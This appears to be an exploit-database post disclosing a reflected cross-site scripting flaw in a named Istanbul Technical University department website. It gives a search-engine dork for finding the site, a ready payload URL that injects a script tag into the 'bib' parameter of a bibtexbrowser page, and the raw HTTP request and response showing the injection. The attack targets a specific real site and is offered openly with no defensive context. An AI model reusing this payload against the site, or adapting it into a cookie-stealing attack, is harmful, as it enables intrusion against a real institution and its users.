İstanbul Teknik University XSS vul

2020.03.03

Anonymous7480 (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: allintext: " www.ehb.itu.edu.tr/ "

###################################################################

# Exploit Title : İstanbul Teknik University Elektronik ve Haberleşme Mühendisliği Bölümü XSS
# Author [ Discovered By ] : Furkan Özer

# Date : 04/03/2020
# Vendor Homepage : http://www.ehb.itu.edu.tr/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-79

/index.php?bib='"()&%1<ScRiPt >prompt(912383)</ScRiPt>&id=bibtexbrowser&lang=tr&year=2016


Request
GET /index.php?bib=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28912383%29%3c%2fScRiPt%3e&id=bibtexbrowser&lang=tr&year=2016 HTTP/1.1
Host: www.ehb.itu.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

Response
HTTP/1.1 200 OK
Date: Mon, 02 Mar 2020 20:59:17 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: private, must-revalidate
Expires: Mon, 02 Mar 2020 21:09:17 GMT
Content-Length: 17802
Keep-Alive: timeout=15, max=31
Connection: Keep-Alive
Content-Type: text/html

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

İstanbul Teknik University XSS vul

Dork: allintext: " www.ehb.itu.edu.tr/ "

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.